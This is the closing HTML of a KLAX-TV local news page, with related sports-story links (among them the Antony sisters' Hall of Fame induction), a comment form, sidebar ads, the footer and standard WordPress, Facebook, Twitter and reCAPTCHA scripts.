						<a href="http://klax-tv.com/anacocos-antony-sisters-to-be-inducted-into-louisiana-high-school-hall-of-fame/" title="Anacoco&#8217;s Antony sisters to be inducted into Louisiana High School Hall of Fame">
							<img width="390" height="205" src="http://klax-tv.com/wp-content/uploads/2020/02/katie-antony-390x205.jpg" class="attachment-colormag-featured-post-medium size-colormag-featured-post-medium wp-post-image" alt="" loading="lazy" />						</a>
					</div>
				
				<div class="article-content">

					<h3 class="entry-title">
						<a href="http://klax-tv.com/anacocos-antony-sisters-to-be-inducted-into-louisiana-high-school-hall-of-fame/" rel="bookmark" title="Anacoco&#8217;s Antony sisters to be inducted into Louisiana High School Hall of Fame">Anacoco&#8217;s Antony sisters to be inducted into Louisiana High School Hall of Fame</a>
					</h3><!--/.post-title-->

					<div class="below-entry-meta">
						<span class="posted-on"><a href="http://klax-tv.com/anacocos-antony-sisters-to-be-inducted-into-louisiana-high-school-hall-of-fame/" title="5:10 pm" rel="bookmark"><i class="fa fa-calendar-o"></i> <time class="entry-date published updated" datetime="2020-02-11T17:10:09-06:00">February 11, 2020</time></a></span>
						<span class="byline"><span class="author vcard"><i class="fa fa-user"></i><a class="url fn n" href="http://klax-tv.com/author/mglover/" title="Meagan Glover">Meagan Glover</a></span></span>

											</div>

				</div>

			</div><!--/.related-->
					<div class="single-related-posts">

				
				<div class="article-content">

					<h3 class="entry-title">
						<a href="http://klax-tv.com/lsua-hires-new-womens-basketball-coach/" rel="bookmark" title="LSUA Hires New Women&#8217;s Basketball Coach">LSUA Hires New Women&#8217;s Basketball Coach</a>
					</h3><!--/.post-title-->

					<div class="below-entry-meta">
						<span class="posted-on"><a href="http://klax-tv.com/lsua-hires-new-womens-basketball-coach/" title="4:30 pm" rel="bookmark"><i class="fa fa-calendar-o"></i> <time class="entry-date published" datetime="2013-10-21T16:30:28-05:00">October 21, 2013</time><time class="updated" datetime="2013-10-21T16:41:33-05:00">October 21, 2013</time></a></span>
						<span class="byline"><span class="author vcard"><i class="fa fa-user"></i><a class="url fn n" href="http://klax-tv.com/author/sally-2/" title="KLAX TV, ABC 31">KLAX TV, ABC 31</a></span></span>

											</div>

				</div>

			</div><!--/.related-->
					<div class="single-related-posts">

				
				<div class="article-content">

					<h3 class="entry-title">
						<a href="http://klax-tv.com/lsua-athletes-honored/" rel="bookmark" title="LSUA Athletes Honored">LSUA Athletes Honored</a>
					</h3><!--/.post-title-->

					<div class="below-entry-meta">
						<span class="posted-on"><a href="http://klax-tv.com/lsua-athletes-honored/" title="6:57 pm" rel="bookmark"><i class="fa fa-calendar-o"></i> <time class="entry-date published" datetime="2015-02-25T18:57:38-06:00">February 25, 2015</time><time class="updated" datetime="2015-02-25T18:59:03-06:00">February 25, 2015</time></a></span>
						<span class="byline"><span class="author vcard"><i class="fa fa-user"></i><a class="url fn n" href="http://klax-tv.com/author/sally-2/" title="KLAX TV, ABC 31">KLAX TV, ABC 31</a></span></span>

											</div>

				</div>

			</div><!--/.related-->
		
	</div><!--/.post-related-->


      
<div id="comments" class="comments-area">

	
	
	
		<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/briscoe-rushes-for-200-yards-but-wildcats-fall-at-umhb/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=briscoe-rushes-for-200-yards-but-wildcats-fall-at-umhb#respond" style="display:none;">Cancel reply</a></small></h3><form action="http://klax-tv.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate><p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> Required fields are marked <span class="required">*</span></p><p class="comment-form-comment"><label for="comment">Comment</label> <textarea id="comment" name="comment" cols="45" rows="8" maxlength="65525" required="required"></textarea></p><p class="comment-form-author"><label for="author">Name <span class="required">*</span></label> <input id="author" name="author" type="text" value="" size="30" maxlength="245" required='required' /></p>
<p class="comment-form-email"><label for="email">Email <span class="required">*</span></label> <input id="email" name="email" type="email" value="" size="30" maxlength="100" aria-describedby="email-notes" required='required' /></p>
<p class="comment-form-url"><label for="url">Website</label> <input id="url" name="url" type="url" value="" size="30" maxlength="200" /></p>
<p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes" /> <label for="wp-comment-cookies-consent">Save my name, email, and website in this browser for the next time I comment.</label></p>
<div class="gglcptch gglcptch_v2"><div id="gglcptch_recaptcha_2021925045" class="gglcptch_recaptcha"></div>
				<noscript>
					<div style="width: 302px;">
						<div style="width: 302px; height: 422px; position: relative;">
							<div style="width: 302px; height: 422px; position: absolute;">
								<iframe src="https://www.google.com/recaptcha/api/fallback?k=6LcJUPMSAAAAAEnli02Dj7ZdXKtI9W4FGTJ_CQIW" frameborder="0" scrolling="no" style="width: 302px; height:422px; border-style: none;"></iframe>
							</div>
						</div>
						<div style="border-style: none; bottom: 12px; left: 25px; margin: 0px; padding: 0px; right: 25px; background: #f9f9f9; border: 1px solid #c1c1c1; border-radius: 3px; height: 60px; width: 300px;">
							<textarea id="g-recaptcha-response" name="g-recaptcha-response" class="g-recaptcha-response" style="width: 250px !important; height: 40px !important; border: 1px solid #c1c1c1 !important; margin: 10px 25px !important; padding: 0px !important; resize: none !important;"></textarea>
						</div>
					</div>
				</noscript></div><p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='74718' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p></form>	</div><!-- #respond -->
	
</div><!-- #comments -->
	</div><!-- #primary -->

	
<div id="secondary">
			
		<aside id="media_image-63" class="widget widget_media_image clearfix"><a href="https://ldh.la.gov/Coronavirus/"><img width="259" height="300" src="http://klax-tv.com/wp-content/uploads/2021/03/daily-numbers-4-259x300.jpg" class="image wp-image-74680  attachment-medium size-medium" alt="" loading="lazy" style="max-width: 100%; height: auto;" srcset="http://klax-tv.com/wp-content/uploads/2021/03/daily-numbers-4-259x300.jpg 259w, http://klax-tv.com/wp-content/uploads/2021/03/daily-numbers-4-768x891.jpg 768w, http://klax-tv.com/wp-content/uploads/2021/03/daily-numbers-4.jpg 773w" sizes="(max-width: 259px) 100vw, 259px" /></a></aside><aside id="media_image-53" class="widget widget_media_image clearfix"><a href="https://www.breastandgyncancer.org/?utm_medium=banner&#038;utm_source=katc.com&#038;utm_campaign=pavilionbranding"><img width="300" height="70" src="http://klax-tv.com/wp-content/uploads/2021/02/mbpcc_tm_h_rev_grs_rgb_200722-1-300x70.png" class="image wp-image-74003  attachment-medium size-medium" alt="" loading="lazy" style="max-width: 100%; height: auto;" srcset="http://klax-tv.com/wp-content/uploads/2021/02/mbpcc_tm_h_rev_grs_rgb_200722-1-300x70.png 300w, http://klax-tv.com/wp-content/uploads/2021/02/mbpcc_tm_h_rev_grs_rgb_200722-1-1024x240.png 1024w, http://klax-tv.com/wp-content/uploads/2021/02/mbpcc_tm_h_rev_grs_rgb_200722-1-768x180.png 768w, http://klax-tv.com/wp-content/uploads/2021/02/mbpcc_tm_h_rev_grs_rgb_200722-1.png 1284w" sizes="(max-width: 300px) 100vw, 300px" /></a></aside><aside id="media_image-55" class="widget widget_media_image clearfix"><a href="https://englandoaks.org/"><img width="300" height="257" src="http://klax-tv.com/wp-content/uploads/2021/01/thumbnail_image003-300x257.jpg" class="image wp-image-73582  attachment-medium size-medium" alt="" loading="lazy" style="max-width: 100%; height: auto;" srcset="http://klax-tv.com/wp-content/uploads/2021/01/thumbnail_image003-300x257.jpg 300w, http://klax-tv.com/wp-content/uploads/2021/01/thumbnail_image003.jpg 451w" sizes="(max-width: 300px) 100vw, 300px" /></a></aside><aside id="media_image-61" class="widget widget_media_image clearfix"><a href="https://www.facebook.com/CenlaIndependentInsuranceBrokersLlc"><img width="300" height="158" src="http://klax-tv.com/wp-content/uploads/2021/01/CIIB-300x158.jpg" class="image wp-image-73545  attachment-medium size-medium" alt="" loading="lazy" style="max-width: 100%; height: auto;" srcset="http://klax-tv.com/wp-content/uploads/2021/01/CIIB-300x158.jpg 300w, http://klax-tv.com/wp-content/uploads/2021/01/CIIB-390x205.jpg 390w, http://klax-tv.com/wp-content/uploads/2021/01/CIIB.jpg 449w" sizes="(max-width: 300px) 100vw, 300px" /></a></aside><aside id="media_image-49" class="widget widget_media_image clearfix"><a href="http://www.unitechtrainingacademy.com/"><img width="300" height="250" src="http://klax-tv.com/wp-content/uploads/2020/07/Unitech-web-banner.jpg" class="image wp-image-70417  attachment-full size-full" alt="" loading="lazy" style="max-width: 100%; height: auto;" /></a></aside><aside id="media_image-45" class="widget widget_media_image clearfix"><a href="https://www.alexandriaer.com/"><img width="300" height="143" src="http://klax-tv.com/wp-content/uploads/2020/12/thumbnail_Image-300x143.jpg" class="image wp-image-72845  attachment-medium size-medium" alt="" loading="lazy" style="max-width: 100%; height: auto;" srcset="http://klax-tv.com/wp-content/uploads/2020/12/thumbnail_Image-300x143.jpg 300w, http://klax-tv.com/wp-content/uploads/2020/12/thumbnail_Image-768x366.jpg 768w, http://klax-tv.com/wp-content/uploads/2020/12/thumbnail_Image.jpg 840w" sizes="(max-width: 300px) 100vw, 300px" /></a></aside><aside id="media_image-43" class="widget widget_media_image clearfix"><img width="300" height="252" src="http://klax-tv.com/wp-content/uploads/2021/02/op-gen-300x252.png" class="image wp-image-74170  attachment-medium size-medium" alt="" loading="lazy" style="max-width: 100%; height: auto;" srcset="http://klax-tv.com/wp-content/uploads/2021/02/op-gen-300x252.png 300w, http://klax-tv.com/wp-content/uploads/2021/02/op-gen-768x644.png 768w, http://klax-tv.com/wp-content/uploads/2021/02/op-gen.png 808w" sizes="(max-width: 300px) 100vw, 300px" /></aside><aside id="media_image-39" class="widget widget_media_image clearfix"><a href="https://www.goarmy.com/info.html?iom=AMKU"><img width="300" height="250" src="http://klax-tv.com/wp-content/uploads/2020/05/300x250.jpg" class="image wp-image-69688  attachment-full size-full" alt="" loading="lazy" style="max-width: 100%; height: auto;" /></a></aside><aside id="media_image-51" class="widget widget_media_image clearfix"><img width="300" height="250" src="http://klax-tv.com/wp-content/uploads/2020/09/IE-300x250-banner-s32.jpg" class="image wp-image-71440  attachment-full size-full" alt="" loading="lazy" style="max-width: 100%; height: auto;" /></aside>
	</div>
	

</div><!-- .inner-wrap -->
</div><!-- #main -->




<footer id="colophon" class="clearfix ">
	
<div class="footer-widgets-wrapper">
	<div class="inner-wrap">
		<div class="footer-widgets-area clearfix">
         <div class="tg-footer-main-widget">
   			<div class="tg-first-footer-widget">
   				<aside id="text-31" class="widget widget_text clearfix"><h3 class="widget-title"><span>About Us</span></h3>			<div class="textwidget">KLAX ABC 31 is Central Louisiana’s source for ABC entertainment, news and sports programming.  In addition to ABC’s award-winning content, KLAX delivers a variety of top-rated syndicated programming, and local news, weather and sports through ABC 31 News. <a href="http://klax-tv.com/about/">Read more...</a></div>
		</aside>   			</div>
         </div>
         <div class="tg-footer-other-widgets">
   			<div class="tg-second-footer-widget">
   				<aside id="linkcat-5" class="widget widget_links clearfix"><h3 class="widget-title"><span>Useful Links</span></h3>
	<ul class='xoxo blogroll'>
<li><a href="http://abc.go.com/" title="Watch ABC shows online!" target="_blank">Watch ABC On-Demand</a></li>
<li><a href="http://www.metv.com" target="_blank">Me-TV Alexandria</a></li>
<li><a href="http://klax-tv.com/gas-buddy/">Gas Buddy</a></li>
<li><a href="http://www.littonweekendadventure.com/">Litton&#039;s Weekend Adventure</a></li>
<li><a href="http://abcnews.go.com/health%20">ABC Health News</a></li>
<li><a href="http://abcnews.go.com/">ABC News</a></li>
<li><a href="https://klaxtv.securepayments.cardpointe.com/pay?total=0.00" title="Make a credit card payment for advertising invoices">Make a payment</a></li>
<li><a href="https://publicfiles.fcc.gov/tv-profile/klax-tv" title="KLAX Public File at FCC.gov" target="_blank">FCC Public File</a></li>
<li><a href="http://klax-tv.com/wp-content/uploads/2020/02/2020-EEO-Public-File-Report-LA.pdf" title="KLAX EEO Information" target="_blank">EEO</a></li>

	</ul>
</aside>
   			</div>
            <div class="tg-third-footer-widget">
               <aside id="theme-my-login-3" class="widget widget_theme_my_login clearfix"><h3 class="widget-title"><span>Log In</span></h3><div class="tml tml-login">
<form name="login" action="http://klax-tv.com/login/" method="post">
<div class="tml-field-wrap tml-log-wrap">
<label class="tml-label" for="user_login">Username</label>
<input name="log" type="text" value="" id="user_login" class="tml-field">
</div>

<div class="tml-field-wrap tml-pwd-wrap">
<label class="tml-label" for="user_pass">Password</label>
<input name="pwd" type="password" value="" id="user_pass" class="tml-field">
</div>


<div class="tml-field-wrap tml-rememberme-wrap">
<input name="rememberme" type="checkbox" value="forever" id="rememberme" class="tml-checkbox">
<label class="tml-label" for="rememberme">Remember Me</label>
</div>

<div class="tml-field-wrap tml-submit-wrap">
<input name="submit" type="submit" value="Log In" class="tml-button">
</div>

<input name="redirect_to" type="hidden" value="/briscoe-rushes-for-200-yards-but-wildcats-fall-at-umhb/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=briscoe-rushes-for-200-yards-but-wildcats-fall-at-umhb">

</form>
</div>
</aside>            </div>
            <div class="tg-fourth-footer-widget">
               <aside id="colormag_125x125_advertisement_widget-6" class="widget widget_125x125_advertisement clearfix">
		<div class="advertisement_125x125">
			<div class="advertisement-content"><a href="http://www.tmz.com" class="single_ad_125x125" target="_blank" rel="nofollow">
                                 <img src="http://klax-tv.com/wp-content/uploads/2016/09/tmz.png" width="125" height="125" alt="">
                              </a></div>		</div>
		</aside>            </div>
         </div>
		</div>
	</div>
</div>	<div class="footer-socket-wrapper clearfix">
		<div class="inner-wrap">
			<div class="footer-socket-area">
				<div class="footer-socket-right-section">
							<div class="social-links clearfix">
			<ul>
				<li><a href="http://www.Facebook.com/KLAX31" target="_blank"><i class="fa fa-facebook"></i></a></li><li><a href="https://twitter.com/KLAXTV" target="_blank"><i class="fa fa-twitter"></i></a></li><li><a href="https://www.instagram.com/klaxtv/" target="_blank"><i class="fa fa-instagram"></i></a></li><li><a href="http://www.youtube.com/klaxproduction" target="_blank"><i class="fa fa-youtube"></i></a></li>			</ul>
		</div><!-- .social-links -->
						</div>

				<div class="footer-socket-left-section">
					<div class="copyright">Copyright &copy; 2021 <a href="http://klax-tv.com/" title="KLAX-TV" ><span>KLAX-TV</span></a>. All rights reserved.<br>Theme: ColorMag by <a href="https://themegrill.com/themes/colormag" target="_blank" title="ThemeGrill" rel="author"><span>ThemeGrill</span></a>. Powered by <a href="https://wordpress.org" target="_blank" title="WordPress"><span>WordPress</span></a>.</div>				</div>
			</div>
		</div>
	</div>
</footer>

<a href="#masthead" id="scroll-up"><i class="fa fa-chevron-up"></i></a>

</div><!-- #page -->
			<div id="fb-root"></div>
			<script>(function(d, s, id) {
				var js, fjs = d.getElementsByTagName(s)[0]; 

				if (d.getElementById(id)) return;
				js = d.createElement(s); js.id = id;

				js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&appId=1443946719181573&version=v2.12";
				fjs.parentNode.insertBefore(js, fjs);
				}(document, 'script', 'facebook-jssdk'));
			</script>
					<script type="text/javascript">
				!function(d,s,id) {var js,fjs=d.getElementsByTagName(s)[0];if (!d.getElementById(id)) {js=d.createElement(s);js.id=id;js.src="https://platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");
			</script>
					<script>
		( function ( body ) {
			'use strict';
			body.className = body.className.replace( /\btribe-no-js\b/, 'tribe-js' );
		} )( document.body );
		</script>
		<script> /* <![CDATA[ */var tribe_l10n_datatables = {"aria":{"sort_ascending":": activate to sort column ascending","sort_descending":": activate to sort column descending"},"length_menu":"Show _MENU_ entries","empty_table":"No data available in table","info":"Showing _START_ to _END_ of _TOTAL_ entries","info_empty":"Showing 0 to 0 of 0 entries","info_filtered":"(filtered from _MAX_ total entries)","zero_records":"No matching records found","search":"Search:","all_selected_text":"All items on this page were selected. ","select_all_link":"Select all pages","clear_selection":"Clear Selection.","pagination":{"all":"All","next":"Next","previous":"Previous"},"select":{"rows":{"0":"","_":": Selected %d rows","1":": Selected 1 row"}},"datepicker":{"dayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"dayNamesShort":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"dayNamesMin":["S","M","T","W","T","F","S"],"monthNames":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesShort":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesMin":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"nextText":"Next","prevText":"Prev","currentText":"Today","closeText":"Done","today":"Today","clear":"Clear"}};/* ]]> */ </script><link rel='stylesheet' id='gglcptch-css'  href='http://klax-tv.com/wp-content/plugins/google-captcha/css/gglcptch.css?ver=1.55' type='text/css' media='all' />
<script type='text/javascript' id='clicktrack-adrotate-js-extra'>
/* <![CDATA[ */
var click_object = {"ajax_url":"http:\/\/klax-tv.com\/wp-admin\/admin-ajax.php"};
/* ]]> */
</script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/plugins/adrotate/library/jquery.adrotate.clicktracker.js' id='clicktrack-adrotate-js'></script>
<script type='text/javascript' id='theme-my-login-js-extra'>
/* <![CDATA[ */
var themeMyLogin = {"action":"","errors":[]};
/* ]]> */
</script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/plugins/theme-my-login/assets/scripts/theme-my-login.min.js?ver=7.0.15' id='theme-my-login-js'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-includes/js/comment-reply.min.js?ver=5.5.3' id='comment-reply-js'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/themes/colormag/js/jquery.bxslider.min.js?ver=4.2.10' id='colormag-bxslider-js'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/themes/colormag/js/navigation.js?ver=5.5.3' id='colormag-navigation-js'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/themes/colormag/js/news-ticker/jquery.newsTicker.min.js?ver=1.0.0' id='colormag-news-ticker-js'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/themes/colormag/js/sticky/jquery.sticky.js?ver=20150309' id='colormag-sticky-menu-js'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/themes/colormag/js/fitvids/jquery.fitvids.js?ver=20150311' id='colormag-fitvids-js'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/themes/colormag/js/skip-link-focus-fix.js?ver=5.5.3' id='colormag-skip-link-focus-fix-js'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/themes/colormag/js/colormag-custom.js?ver=5.5.3' id='colormag-custom-js'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-includes/js/wp-embed.min.js?ver=5.5.3' id='wp-embed-js'></script>
<script type='text/javascript' data-cfasync="false" async="async" defer="defer" src='https://www.google.com/recaptcha/api.js?render=explicit&#038;ver=1.55' id='gglcptch_api-js'></script>
<script type='text/javascript' id='gglcptch_script-js-extra'>
/* <![CDATA[ */
var gglcptch = {"options":{"version":"v2","sitekey":"6LcJUPMSAAAAAEnli02Dj7ZdXKtI9W4FGTJ_CQIW","error":"<strong>Warning<\/strong>:&nbsp;More than one reCAPTCHA has been found in the current form. Please remove all unnecessary reCAPTCHA fields to make it work properly.","disable":0,"theme":"light"},"vars":{"visibility":false}};
/* ]]> */
</script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/plugins/google-captcha/js/script.js?ver=1.55' id='gglcptch_script-js'></script>
</body>
</html>
